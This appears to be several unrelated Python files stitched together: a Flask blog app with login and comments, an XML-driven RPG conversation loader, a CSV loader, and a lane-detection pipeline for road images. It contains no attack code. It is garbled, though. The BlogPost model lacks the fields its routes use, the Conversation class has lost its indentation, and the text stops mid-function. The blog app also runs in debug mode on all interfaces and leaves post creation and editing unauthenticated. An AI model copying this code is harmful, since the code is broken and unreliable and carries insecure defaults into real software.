AnonymousUserMixin
import os
# Application and extension wiring.
app = Flask(__name__)
app.config['SECRET_KEY'] = os.environ.get("SECRET_KEY")
ckeditor = CKEditor(app)
Bootstrap(app)
# CONNECT TO DB
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get("DATABASE_URL1")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
login_manager = LoginManager()
# Fix: use the documented init_app() hook rather than re-invoking __init__()
# on an already-constructed LoginManager.
login_manager.init_app(app)
# CONFIGURE TABLE
class BlogPost(db.Model):
    """A blog entry. `date` is stored as a display string (see new_post(),
    which formats it as month-day-year); `author` is free text, not a FK."""
    id = db.Column(db.Integer, primary_key=True)
    id = db.Column(db.Integer, primary_key=True) if False else id  # noqa
class Comment(db.Model):
    """A comment on a post; linked to BlogPost via the plain integer
    blog_id (no foreign-key constraint is declared)."""
    id = db.Column(db.Integer, primary_key=True)
    comment = db.Column(db.String(250), nullable=False, unique=False)
    name = db.Column(db.String(30), nullable=False, unique=False)
    blog_id = db.Column(db.Integer, nullable=False)
class User(UserMixin, db.Model):
    """Registered user. `password` holds a werkzeug hash (see register()),
    never plaintext. UserMixin supplies the Flask-Login interface."""
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(250), nullable=False)
    name = db.Column(db.String(30), nullable=False, unique=True)
    password = db.Column(db.String(250), nullable=False)
# Create any missing tables at startup (no-op for tables that already exist).
db.create_all()
@login_manager.user_loader
def user_loader(user_id):
    """Reload the logged-in user from the session cookie.

    Flask-Login stores the id as a string; cast to int so the lookup
    matches the Integer primary-key column.
    """
    return User.query.get(int(user_id))
class CommentForm(FlaskForm):
    """Single rich-text field for commenting on a post."""
    comment = CKEditorField("Comment", validators=[DataRequired()])
    submit = SubmitField("Submit")
class RegisterForm(FlaskForm):
    """Sign-up form.

    NOTE(review): password uses a plain StringField (visible while typing)
    and email has no Email validator — consider PasswordField/Email().
    """
    email = StringField("Email", validators=[DataRequired()])
    name = StringField("Name", validators=[DataRequired()])
    password = StringField("Password", validators=[DataRequired()])
    submit = SubmitField("Submit")
class Login(FlaskForm):
    """Login form: email + password."""
    email = StringField("Email", validators=[DataRequired()])
    password = StringField("Password", validators=[DataRequired()])
    submit = SubmitField("Submit")
# WTForm
class CreatePostForm(FlaskForm):
    """Form for creating and editing blog posts (shared by both views)."""
    title = StringField("Blog Post Title", validators=[DataRequired()])
    subtitle = StringField("Subtitle", validators=[DataRequired()])
    author = StringField("Your Name", validators=[DataRequired()])
    img_url = StringField("Blog Image URL", validators=[DataRequired(), URL()])
    body = CKEditorField("Blog Content", validators=[DataRequired()])
    submit = SubmitField("Submit Post")
@app.route('/')
def get_all_posts():
    """Home page: render every blog post."""
    # Query directly — the original copied the result into a second list
    # element by element, which added nothing.
    posts = db.session.query(BlogPost).all()
    return render_template("index.html", all_posts=posts)
@app.route("/post/<int:index>", methods=["POST", "GET"])
def show_post(index):
    """Display one post with its comments; handle comment submission.

    Anonymous users who try to comment are redirected to the login page.
    """
    requested_post = BlogPost.query.get(index)
    form = CommentForm()
    if request.method == "POST":
        # current_user has no .name when nobody is logged in; catch only
        # that case — the original bare `except` hid every other error.
        try:
            name = current_user.name
        except AttributeError:
            return redirect(url_for("login"))
        new_comment = Comment(comment=form.comment.data, name=name,
                              blog_id=int(index))
        db.session.add(new_comment)
        db.session.commit()
        return redirect(url_for("show_post", index=index))
    comments = Comment.query.filter_by(blog_id=int(index))
    return render_template("post.html", post=requested_post, form=form,
                           comments=comments)
@app.route("/about")
def about():
    """Static about page."""
    return render_template("about.html")
@app.route("/contact")
def contact():
    """Static contact page."""
    return render_template("contact.html")
@app.route("/newpost", methods=["POST", "GET"])
def new_post():
    """Create a new blog post from the submitted form."""
    form = CreatePostForm()
    if request.method == "POST":
        # Take one timestamp — the original called datetime.now() three
        # times, so month/day/year could straddle midnight.
        now = datetime.now()
        blog_post = BlogPost(
            title=form.title.data,
            subtitle=form.subtitle.data,
            body=form.body.data,
            author=form.author.data,
            img_url=form.img_url.data,
            date=f"{now.month}-{now.day}-{now.year}"
        )
        db.session.add(blog_post)
        db.session.commit()
        return redirect(url_for("get_all_posts"))
    return render_template("make-post.html", form=form)
@app.route("/edit/id/<int:id>", methods=["POST", "GET"])
def edit(id):
    """Edit an existing post: GET pre-fills the form, POST saves the changes."""
    form = CreatePostForm()
    post = BlogPost.query.get(id)
    fields = ("title", "subtitle", "body", "author", "img_url")
    if request.method == "GET":
        # Seed the form from the stored post so the user edits in place.
        for field in fields:
            getattr(form, field).data = getattr(post, field)
        return render_template("edit.html", form=form, id=id)
    elif request.method == "POST":
        # Copy every edited field back onto the model and persist it.
        for field in fields:
            setattr(post, field, getattr(form, field).data)
        db.session.commit()
        return redirect(url_for('get_all_posts'))
@app.route("/register", methods=["POST", "GET"])
def register():
    """Sign-up page: create a user with a salted password hash."""
    form = RegisterForm()
    if request.method == "GET":
        return render_template("register.html", form=form)
    elif request.method == "POST":
        # Store only the werkzeug hash, never the plaintext password.
        hash_password = generate_password_hash(password=form.password.data,
                                               salt_length=8)
        db.session.add(User(email=form.email.data,
                            name=form.name.data,
                            password=hash_password))
        db.session.commit()
        return redirect(url_for("get_all_posts"))
@app.route("/login", methods=["POST", "GET"])
def login():
    """Log a user in by email and password."""
    form = Login()
    if request.method == "POST":
        user = User.query.filter_by(email=form.email.data).first()
        # Guard against unknown emails: the original dereferenced
        # user.password unconditionally and crashed with AttributeError
        # when no user matched; a wrong password returned None (HTTP 500).
        if user and check_password_hash(pwhash=user.password,
                                        password=form.password.data):
            login_user(user=user)
            return redirect(url_for("get_all_posts"))
        # Bad credentials: show the login form again.
        return render_template("login.html", form=form)
    return render_template(template_name_or_list="login.html", form=form)
@app.route("/logout")
@login_required
def logout():
    """End the current session.

    Bug fix: the original called login_user() with no arguments (a
    TypeError at runtime); ending a session requires logout_user().
    """
    logout_user()
    return redirect(url_for('get_all_posts'))
# Run the development server when executed directly.
# NOTE(review): debug=True must be disabled for any production deployment.
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000, debug=True)
|
__author__ = 'KeithW'
from xml.dom.minidom import *
from .RPGXMLUtilities import *
class ConversationLine(object):
    """One line of NPC dialogue plus a delivered/not-delivered flag."""

    # Outcome codes for a line attempt.
    NOT_ATTEMPTED = 0
    SUCCEEDED = 1
    FAILED = -1
    REWARDED = 2

    def __init__(self, text : str):
        self.text = text
        self.completed = False

    def is_completed(self):
        """Has this line been delivered yet?"""
        return self.completed

    def attempt(self):
        """Mark the line as delivered and report the new state."""
        self.completed = True
        return self.completed
class Conversation(object):
def __init__(self, owner : str, linear: bool = True):
self.owner = owner
self._lines = []
self.linear = linear
self.current_line = 0
def add_line(self, new_line : ConversationLine):
self._lines.append(new_line)
def is_completed(self):
completed = True
for line in self._lines:
if line.is_completed() is False:
completed = False
break
return completed
# Get the next line in the conversation
def get_next_line(self):
# If this conversation has been completed...
if self.is_completed():
# then just pick a line at random that is still available
line = self._lines[random.randint(0,len(self._lines)-1)]
# Else cycle through the lines in sequence
else:
line = self._lines[self.current_line]
# Move to the next line of the conversation
self.current_line += 1
# If you have reached the end of the conversation then go back to the beginning
if self.current_line >= len(self._lines):
self.current_line = 0
return line
def print(self):
print("%s conversation." % self.owner)
for line in self._lines:
print(str(line))
class ConversationFactory(object):
    """Loads NPC conversations from an XML file and serves them by NPC name.

    Expected document shape: a root <conversations> element containing
    <conversation> nodes, each with <npc_name>, <linear> and <line> children.
    """

    def __init__(self, file_name : str):
        # Path of the XML file holding the <conversations> document.
        self.file_name = file_name
        # minidom Document; only held during load() and unlinked afterwards.
        self._dom = None
        # Map of NPC name -> Conversation, populated by load().
        self._conversations = {}

    def get_conversation(self, npc_name : str):
        """Return the Conversation owned by npc_name, or None if unknown."""
        if npc_name in self._conversations.keys():
            return self._conversations[npc_name]
        else:
            return None

    def print(self):
        # Dump every loaded conversation to stdout (debug aid).
        for conversation in self._conversations.values():
            conversation.print()

    # Load in the quest contained in the quest file
    def load(self):
        """Parse the XML file and build one Conversation per <conversation>.

        NOTE(review): `parse`, `xml_get_node_text` and (presumably) `logging`
        come from the module's wildcard imports -- verify they resolve.
        """
        self._dom = parse(self.file_name)
        assert self._dom.documentElement.tagName == "conversations"
        logging.info("%s.load(): Loading in %s", __class__, self.file_name)
        # Get a list of all conversations
        conversations = self._dom.getElementsByTagName("conversation")
        # for each conversation...
        for conversation in conversations:
            # Get the main tags that describe the conversation
            npc_name = xml_get_node_text(conversation, "npc_name")
            linear = (xml_get_node_text(conversation, "linear") == "True")
            # ...and create a basic conversation object
            new_conversation = Conversation(npc_name, linear = linear)
            logging.info("%s.load(): Loading Conversation for NPC '%s'...", __class__, new_conversation.owner)
            # Next get a list of all of the lines
            lines = conversation.getElementsByTagName("line")
            # For each line...
            for line in lines:
                # Get the basic details of the line
                text = xml_get_node_text(line, "text")
                # ... and create a basic line object which we add to the owning conversation
                new_line = ConversationLine(text)
                new_conversation.add_line(new_line)
                logging.info("%s.load(): Loading line '%s'...", __class__, new_line.text)
            logging.info("%s.load(): Conversation '%s' loaded", __class__, new_conversation.owner)
            # Add the new conversation to the dictionary
            self._conversations[new_conversation.owner] = new_conversation
        # Release the DOM tree -- minidom documents need explicit unlinking.
        self._dom.unlink()
|
"""Reads the given csv file into a list of strings containing the names of the securities."""
import csv
import os
def load(file):
    """Read the first row of the given CSV file as a list of strings.

    file: path to a CSV file whose first row holds the security names.
    return: list of the fields of the first row.
    raises: AssertionError if the path is not an existing regular file;
            StopIteration if the file is empty.
    """
    # NOTE: assert kept for backward compatibility (AssertionError type),
    # though it is stripped under `python -O`; open() would raise
    # FileNotFoundError on its own.
    assert os.path.isfile(file)
    # newline="" is required by the csv module so quoted fields containing
    # newlines are parsed correctly.
    with open(file, newline="") as f:
        reader = csv.reader(f)
        return next(reader)
|
import os
import datetime
import glob
import pickle
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import matplotlib.lines as mlines
from matplotlib.path import Path
import matplotlib.patches as patches
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
# helper functions
def log(stage, msg):
    '''
    Print a timestamped logging statement in this format:
        <time> : <stage> : <msg>
    example:
        2017-04-28 12:48:45 : info : chess board corners found in image calibration20.jpg
    '''
    # Drop the fractional seconds from the default datetime repr.
    timestamp = str(datetime.datetime.now()).split('.')[0]
    print(" : ".join((timestamp, stage, msg)))
def writeImage(item, dir, basename, cmap=None):
    '''
    write an image to file as <dir>/<basename>.png
    item: matplotlib figure, or a numpy array -- a 1-D array is rendered
          as a line plot, any other array is saved directly as an image
    dir: output directory (created if it does not exist)
    basename: file name without extension; ".png" is appended
    cmap: optional colormap forwarded to mpimg.imsave for array input
    '''
    # create dir if nonexistent
    if not os.path.isdir(dir):
        log('info', 'creating output directory: ' + dir)
        os.mkdir(dir)
    # if numpy array - write it
    #if type ==
    # define filename
    file = dir + '/' + basename + '.png'
    log('info', 'writing image: ' + file)
    # if ndarray
    if isinstance(item, np.ndarray):
        if len(item.shape) == 1:
            # 1-D data: draw it as a plot and save the resulting figure
            fig = plt.figure(1)
            ax = plt.axes()
            plt.plot(item)
            fig.savefig(file)
        else:
            # 2-D/3-D data: save the pixels directly
            mpimg.imsave(file, item, cmap=cmap)
    else:
        # anything else is assumed to be a matplotlib figure
        fig = item
        fig.savefig(file)
    # reset pyplot's implicit figure state so later plots start clean
    plt.clf()
def laneLinePipeline(rgb, mtx, dist, outDir, retNr, leftLine, rightLine, format, sobel_kernel=5, mag_sobelxy_thresh=(70, 100), hls_thresh=(120, 255), lab_thresh=(160, 255), luv_thresh=(200, 255)):
    '''
    processes an image from input to output in finding a lane line
    rgb: input image in RGB colorspace
    mtx: camera calibration matrix
    dist: camera distortion coefficients
    outDir: output directory path
    retNr: return the result of a certain step of the pipeline (0..12)
    leftLine: tracking instance for the left line
    rightLine: tracking instance for the right line
    format: normal|collage4|collage9 for creating collages
    sobel_kernel: size of the sobel kernel
    mag_sobelxy_thresh: tuple of min and max threshold for the binary generation
    hls_thresh / lab_thresh / luv_thresh: channel thresholds for the masks
    return: (image, leftLine, rightLine); retNr == 0 returns only the raw
            image (historic behavior, kept for backward compatibility)

    Fixes: every early-exit used `retNr is N`, an identity comparison with
    int literals that relies on CPython's small-int cache and raises
    SyntaxWarning since 3.8 -- replaced with `==`. Deprecated np.fromstring
    replaced with np.frombuffer (same bytes->uint8 view).
    '''
    # store for the intermediate steps of the processing pipeline
    imageBank = {}
    imageBank[0] = rgb
    if retNr == 0:
        return rgb
    ###############################
    #
    # STEP 1: UNDISTORT IMAGE
    #
    ###############################
    rgb_undistort = cv2.undistort(rgb, mtx, dist, None, mtx)
    imageBank[1] = rgb_undistort
    if retNr == 1:
        return rgb_undistort, leftLine, rightLine
    ###############################
    #
    # STEP 2: CREATE A GRAYSCALE VERSION OF THE UNDISTORTED IMAGE
    #
    ###############################
    gray = cv2.cvtColor(rgb_undistort, cv2.COLOR_RGB2GRAY)
    gray_as_rgb = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)
    imageBank[2] = gray_as_rgb
    if retNr == 2:
        return gray_as_rgb, leftLine, rightLine
    ###############################
    #
    # STEP 3: CREATE A BINARY MASK OF THE B OF THE LAB COLORSPACE VERSION
    #
    ###############################
    binary_output_b_of_lab = getBinaryBLab(rgb_undistort, lab_thresh)
    binary_output_b_of_lab_as_rgb = cv2.cvtColor(binary_output_b_of_lab * 255, cv2.COLOR_GRAY2RGB)
    imageBank[3] = binary_output_b_of_lab_as_rgb
    if retNr == 3:
        return binary_output_b_of_lab_as_rgb, leftLine, rightLine
    ###############################
    #
    # STEP 4: CREATE A BINARY MASK OF THE L OF THE LUV COLORSPACE VERSION
    #
    ###############################
    binary_output_l_of_luv = getBinaryLLuv(rgb_undistort, luv_thresh)
    binary_output_l_of_luv_as_rgb = cv2.cvtColor(binary_output_l_of_luv * 255, cv2.COLOR_GRAY2RGB)
    imageBank[4] = binary_output_l_of_luv_as_rgb
    if retNr == 4:
        return binary_output_l_of_luv_as_rgb, leftLine, rightLine
    ###############################
    #
    # STEP 5: COMBINE THE TWO BINARY MASKS IN ONE IMAGE
    #
    ###############################
    binary_combined = combineBinaries([binary_output_b_of_lab, binary_output_l_of_luv])
    binary_combined_as_rgb = cv2.cvtColor(binary_combined * 255, cv2.COLOR_GRAY2RGB)
    imageBank[5] = binary_combined_as_rgb
    if retNr == 5:
        return binary_combined_as_rgb, leftLine, rightLine
    ###############################
    #
    # STEP 6,7,8: WARP THE COMBINED BINARY MASK TO BIRDS EYE VIEW
    #
    ###############################
    binary_combined_warped, figs, M, Minv = transformToBirdsView(binary_combined)
    # render the source-polygon figure into an RGB array of the frame's size
    figs[0].canvas.draw()  # draw the canvas, cache the renderer
    tmp = np.frombuffer(figs[0].canvas.tostring_rgb(), dtype=np.uint8)
    unwarped_binary_with_polygon = cv2.resize(tmp.reshape(figs[0].canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
    imageBank[6] = unwarped_binary_with_polygon
    if retNr == 6:
        return unwarped_binary_with_polygon, leftLine, rightLine
    figs[1].canvas.draw()  # draw the canvas, cache the renderer
    tmp = np.frombuffer(figs[1].canvas.tostring_rgb(), dtype=np.uint8)
    warped_binary_with_polygon = cv2.resize(tmp.reshape(figs[1].canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
    imageBank[7] = warped_binary_with_polygon
    if retNr == 7:
        return warped_binary_with_polygon, leftLine, rightLine
    binary_combined_warped_as_rgb = cv2.cvtColor(binary_combined_warped * 255, cv2.COLOR_GRAY2RGB)
    imageBank[8] = binary_combined_warped_as_rgb
    if retNr == 8:
        return binary_combined_warped_as_rgb, leftLine, rightLine
    ###############################
    #
    # STEP 9: CREATE A HISTOGRAM OF THE LOWER HALF OF THE COMBINED BINARY MASK
    #
    ###############################
    # take a histogram along all the columns in the lower half of the image
    histogram = np.sum(binary_combined_warped[binary_combined_warped.shape[0]//2:, :], axis=0)
    plt.clf()
    fig = plt.figure(1)
    ax = plt.axes()
    plt.plot(histogram)
    fig.canvas.draw()
    tmp = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
    histogram_as_rgb = cv2.resize(tmp.reshape(fig.canvas.get_width_height()[::-1] + (3,)), (rgb_undistort.shape[1], rgb_undistort.shape[0]))
    imageBank[9] = histogram_as_rgb
    if retNr == 9:
        return histogram_as_rgb, leftLine, rightLine
    # calc lane width (False when either line has no x position yet)
    widthMeter = calcLaneWidth(leftLine, rightLine)
    ###############################
    #
    # STEP 10: DETECT LANE LINES AND CREATE A POLYFIT 2ND ORDER
    #
    ###############################
    if leftLine.isDetected() and rightLine.isDetected() and isLaneWidthPlausible(widthMeter):
        # both lines were found last frame and look plausible: search near them
        detected_or_sliding_window, left_poly_coeff, right_poly_coeff = findLinesSimple(binary_combined_warped, leftLine.getBestPolyCoeff(), rightLine.getBestPolyCoeff())
    else:
        # finding the lines from scratch with a sliding window
        detected_or_sliding_window, left_poly_coeff, right_poly_coeff = findLines(binary_combined_warped)
    imageBank[10] = detected_or_sliding_window
    if retNr == 10:
        return detected_or_sliding_window, leftLine, rightLine
    # if one line is faulty recognized and jumps, substitute it
    left_poly_coeff_smooth, right_poly_coeff_smooth, correctionStatement = smoothPolyCoeff(leftLine, rightLine, left_poly_coeff, right_poly_coeff)
    # set the coeffs
    leftLine.setDetected(True)
    rightLine.setDetected(True)
    leftLine.setCurrentPolyCoeff(left_poly_coeff_smooth)
    rightLine.setCurrentPolyCoeff(right_poly_coeff_smooth)
    # generate x-y-values for plotting the lines
    left_line_x, right_line_x, both_lines_y = generateLineXYValues(rgb, leftLine.getBestPolyCoeff(), rightLine.getBestPolyCoeff())
    # calculate radius of lane
    leftRadiusMeter, rightRadiusMeter = calcRadius(left_line_x, right_line_x, both_lines_y)
    leftLine.setRadiusOfCurvature(leftRadiusMeter)
    rightLine.setRadiusOfCurvature(rightRadiusMeter)
    ###############################
    #
    # STEP 11: DRAW POLYFITTED LINES AND LANE TO UNDISTORTED IMAGE
    #
    ###############################
    # draw the polyfitted lines on undistorted original image
    polyfit_on_undistorted = drawPolyfitOnImage(rgb_undistort, binary_combined_warped, Minv, left_line_x, right_line_x, both_lines_y)
    imageBank[11] = polyfit_on_undistorted
    if retNr == 11:
        return polyfit_on_undistorted, leftLine, rightLine
    # calc the deviation of the lane center of vehicle
    vehicleCenterDeviation = calcVehicleDeviation(left_line_x, right_line_x, both_lines_y)
    leftLine.setLineBasePos(vehicleCenterDeviation)
    rightLine.setLineBasePos(vehicleCenterDeviation)
    ###############################
    #
    # STEP 12: WRITE ADDITIONAL DATA ONTO IMAGE
    #
    ###############################
    # write text on image
    resultImage = writeText(polyfit_on_undistorted, (leftRadiusMeter+rightRadiusMeter)/2, vehicleCenterDeviation, widthMeter, correctionStatement)
    imageBank[12] = resultImage
    if retNr == 12:
        return resultImage, leftLine, rightLine
    if format == 'collage4':
        return genCollage(4, imageBank), leftLine, rightLine
    elif format == 'collage9':
        return genCollage(9, imageBank), leftLine, rightLine
    return resultImage, leftLine, rightLine
def genCollage(amount, imageBank):
    '''
    generating a 2x2 or 3x3 collage
    amount: 4 -> 2x2 collage; 9 -> 3x3 collage
    imageBank: dict of pipeline step number -> image
    return: collage resized to 1920px width, or None for other amounts
    '''
    collage = None
    # which pipeline steps fill which grid cells, per collage size
    if amount == 4:
        grid = [[1, 5], [10, 12]]
    elif amount == 9:
        grid = [[1, 2, 4], [5, 6, 8], [9, 10, 12]]
    else:
        return collage
    rows = [cv2.hconcat([imageBank[i] for i in row]) for row in grid]
    collage = cv2.vconcat(rows)
    # scale down/up to a fixed 1920px width, keeping the aspect ratio
    scale = 1920 / collage.shape[1]
    collage = cv2.resize(collage, (1920, int(scale * collage.shape[0])))
    return collage
def calcVehicleDeviation(left_poly_x, right_poly_x, poly_y):
    '''
    calculating the deviation of vehicle of the center of the lane
    left_poly_x: x-values for the left line (image bottom is the last entry)
    right_poly_x: x-values for the right line
    poly_y: y-values (unused; kept for interface compatibility)
    return: deviation in meters (neg => left of center, pos => right of center)
    '''
    # lane width at the bottom of the image, in pixels
    lane_width_px = right_poly_x[-1] - left_poly_x[-1]
    # lane centre and camera centre (camera sits mid-frame of a 1280px image)
    lane_center_px = left_poly_x[-1] + lane_width_px / 2
    camera_center_px = 1280 / 2
    # assume a standard 3.7 m lane to convert pixels to meters
    meters_per_px = 3.7 / lane_width_px
    return (camera_center_px - lane_center_px) * meters_per_px
def calcLaneWidth(leftLine, rightLine):
    '''
    calculate lane width in meters
    leftLine: line-tracking object exposing getX()
    rightLine: line-tracking object exposing getX()
    return: lane width in meters, or False when either x position is missing
    '''
    left_x = leftLine.getX()
    right_x = rightLine.getX()
    # a falsy x (None/0) means the line has no position yet
    if not (left_x and right_x):
        return False
    # a 3.7 m lane spans roughly 700 px in the warped image
    meters_per_px = 3.7 / 700
    return (right_x - left_x) * meters_per_px
def isLaneWidthPlausible(widthMeter):
    '''
    determine whether lane width is plausible.
    widthMeter: width in meters; falsy values (False/0/None) mean "unknown"
    return: True when 3 m <= width <= 4.5 m

    Bug fix: the upper-bound check used to read
    `upperBoundMeter > upperBoundMeter` -- a constant compared with itself,
    always False -- so any width above 4.5 m was accepted as plausible.
    '''
    lowerBoundMeter = 3
    upperBoundMeter = 4.5
    if not widthMeter:
        return False
    return lowerBoundMeter <= widthMeter <= upperBoundMeter
def writeText(img, curvatureMeter, vehicleCenterDeviation, laneWidth, correctionStatement):
    '''
    writes the lane curvature and vehicle offset onto the image
    img: image (modified in place)
    curvatureMeter: the curvature in meters
    vehicleCenterDeviation: offset from lane center in meters (neg => left)
    laneWidth: lane width in meters (currently unused, kept for interface)
    correctionStatement: last correction decision text (currently unused)
    return: image with the text rendered on it

    Fix: the local `dir` shadowed the builtin of the same name; renamed to
    `direction`.
    '''
    font = cv2.FONT_HERSHEY_SIMPLEX
    direction = 'right'
    if vehicleCenterDeviation < 0:
        direction = 'left'
    cv2.putText(img, 'Radius of Curvature = '+str(int(curvatureMeter))+'m', (50, 50), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
    cv2.putText(img, 'Vehicle is '+'{:4.2f}'.format(abs(vehicleCenterDeviation))+'m '+direction+' of center', (50, 80), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
    # cv2.putText(img, correctionStatement, (50, 110), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
    # if laneWidth != None:
    #     cv2.putText(img, 'Lane Width is '+'{:4.2f}'.format(laneWidth)+'m ', (50, 140), font, 0.8, (0, 255, 0), 2, cv2.LINE_AA)
    return img
def calcRadius(leftx, rightx, ploty):
    '''
    calculate the radius of curvature of the left and the right line
    leftx: x-values for the left line
    rightx: x-values for the right line
    ploty: y-values for both lines
    return: leftRadius, rightRadius (in meters)

    NOTE: also plots both lines into pyplot's current (global) figure as a
    side effect -- callers relying on the figure state should be aware.
    '''
    # Generate some fake data to represent lane-line pixels
    # ploty = np.linspace(0, 719, num=720)# to cover same y-range as image
    # quadratic_coeff = 3e-4 # arbitrary quadratic coefficient
    # For each y position generate random x position within +/-50 pix
    # of the line base position in each case (x=200 for left, and x=900 for right)
    # leftx = np.array([200 + (y**2)*quadratic_coeff + np.random.randint(-50, high=51)
    #                   for y in ploty])
    # rightx = np.array([900 + (y**2)*quadratic_coeff + np.random.randint(-50, high=51)
    #                    for y in ploty])
    leftx = leftx[::-1]  # Reverse to match top-to-bottom in y
    rightx = rightx[::-1]  # Reverse to match top-to-bottom in y
    # Fit a second order polynomial to pixel positions in each fake lane line
    left_fit = np.polyfit(ploty, leftx, 2)
    left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
    right_fit = np.polyfit(ploty, rightx, 2)
    right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
    # Plot up the fake data (debug visualization into the global figure)
    mark_size = 3
    plt.plot(leftx, ploty, 'o', color='red', markersize=mark_size)
    plt.plot(rightx, ploty, 'o', color='blue', markersize=mark_size)
    plt.xlim(0, 1280)
    plt.ylim(0, 720)
    plt.plot(left_fitx, ploty, color='green', linewidth=3)
    plt.plot(right_fitx, ploty, color='green', linewidth=3)
    plt.gca().invert_yaxis()  # to visualize as we do the images
    # Define y-value where we want radius of curvature
    # I'll choose the maximum y-value, corresponding to the bottom of the image
    y_eval = np.max(ploty)
    # pixel-space curvature (only used for reference/debugging below)
    left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
    right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
    #print(left_curverad, right_curverad)
    # Example values: 1926.74 1908.48
    # Define conversions in x and y from pixels space to meters
    ym_per_pix = 30/720  # meters per pixel in y dimension
    xm_per_pix = 3.7/700  # meters per pixel in x dimension
    # Fit new polynomials to x,y in world space
    left_fit_cr = np.polyfit(ploty*ym_per_pix, leftx*xm_per_pix, 2)
    right_fit_cr = np.polyfit(ploty*ym_per_pix, rightx*xm_per_pix, 2)
    # Calculate the new radii of curvature (standard curvature formula for
    # a 2nd-order polynomial, evaluated at the image bottom)
    left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
    right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
    # Now our radius of curvature is in meters
    #print(left_curverad, 'm', right_curverad, 'm')
    # Example values: 632.1 m 626.2 m
    return left_curverad, right_curverad
def drawPolyfitOnImage(undistorted, warped, Minv, left_fitx, right_fitx, ploty):
    '''
    draws the detected lane area back onto the undistorted camera image
    undistorted: undistorted original image
    warped: warped binary image (used only for its shape)
    Minv: inverse perspective matrix (birds-eye view -> camera view)
    left_fitx: x-values for the left line
    right_fitx: x-values for the right line
    ploty: y-values for both lines
    return: undistorted image blended with the green lane polygon
    '''
    # Create an image to draw the lines on
    warp_zero = np.zeros_like(warped).astype(np.uint8)
    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
    # Recast the x and y points into usable format for cv2.fillPoly()
    # (the right-line points are flipped so the polygon outline is contiguous)
    pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
    pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
    pts = np.hstack((pts_left, pts_right))
    # Draw the lane onto the warped blank image
    cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
    # Warp the blank back to original image space using inverse perspective matrix (Minv)
    newwarp = cv2.warpPerspective(color_warp, Minv, (undistorted.shape[1], undistorted.shape[0]))
    # Combine the result with the original image (30% lane overlay)
    result = cv2.addWeighted(undistorted, 1, newwarp, 0.3, 0)
    return result
def drawPolyfit(sampleOneChannelImage, left_poly_x, right_poly_x, poly_y):
    '''
    draws the area between the polyfit lines as a binary image
    sampleOneChannelImage: to sample the shape from for the target image
    left_poly_x: x-values for the left line
    right_poly_x: x-values for the right line
    poly_y: y-values for both lines
    return: binary mask with 1s between the two lines

    Fix: removed a redundant inner loop that re-assigned the identical full
    row slice once per x position between the lines (O(width) extra passes
    per row); a single slice assignment per row is equivalent.
    '''
    # empty image with the same spatial shape (and dtype) as the source
    polyfit_binary = np.zeros_like(sampleOneChannelImage)
    for i in range(len(poly_y)):
        # fill the row between the left and right line x positions
        polyfit_binary[int(poly_y[i])][int(left_poly_x[i]):int(right_poly_x[i])] = 1
    return polyfit_binary
def generateLineXYValues(sampleImage, left_poly_coeff, right_poly_coeff):
    '''
    generate x and y values from 2nd-order polyfit coefficients
    sampleImage: sample image; its height defines the y range
    left_poly_coeff: polyfit coefficients for the left line
    right_poly_coeff: polyfit coefficients for the right line
    return: left_x, right_x, plot_y
    '''
    height = sampleImage.shape[0]
    # one y value per image row
    ploty = np.linspace(0, height - 1, height)
    # evaluate x = a*y^2 + b*y + c for each line
    left_fitx = np.polyval(left_poly_coeff, ploty)
    right_fitx = np.polyval(right_poly_coeff, ploty)
    return left_fitx, right_fitx, ploty
def smoothPolyCoeff(leftLine, rightLine, left_poly_coeff, right_poly_coeff):
    '''
    if one polyfit jumps and the other remains pretty much the same as in the last timestep
    the jumping one will be substituted by its line's best (smoothed) coefficients
    leftLine/rightLine: tracking objects with getRecentPolyCoeff()/getBestPolyCoeff()
    left_poly_coeff/right_poly_coeff: current-frame 2nd-order coefficients
    return: (left_poly_coeff, right_poly_coeff, statement) -- statement
            documents which line, if any, was corrected
    '''
    statement = "no correction"
    # only possible once at least one previous frame has been recorded
    if (len(leftLine.getRecentPolyCoeff()) > 0):
        # print('full coeffs:', left_poly_coeff)
        # print('3rd coeffs:', left_poly_coeff[2])
        # print('full recent coeffs:', leftLine.getRecentPolyCoeff()[-1])
        # print('3rd coeffs:', leftLine.getRecentPolyCoeff()[-1][2])
        # change of each line's x-intercept (coefficient c) since last frame
        leftChangePx = left_poly_coeff[2] - leftLine.getRecentPolyCoeff()[-1][2]
        rightChangePx = right_poly_coeff[2] - rightLine.getRecentPolyCoeff()[-1][2]
        # print('change of left line:', leftChangePx)
        # print('change of right line:', rightChangePx)
        # if the lines are diverging
        if leftChangePx - rightChangePx > 100:
            # print('ITs A JUMP!')
            # the line with the biggest change is considered faulty
            if abs(leftChangePx) > abs(rightChangePx):
                # left line faulty
                # overwrite the faulty left poly coeffs with the line's best fit
                # print('left is faulty')
                left_poly_coeff = leftLine.getBestPolyCoeff()
                # get the 3rd coeff of last frame
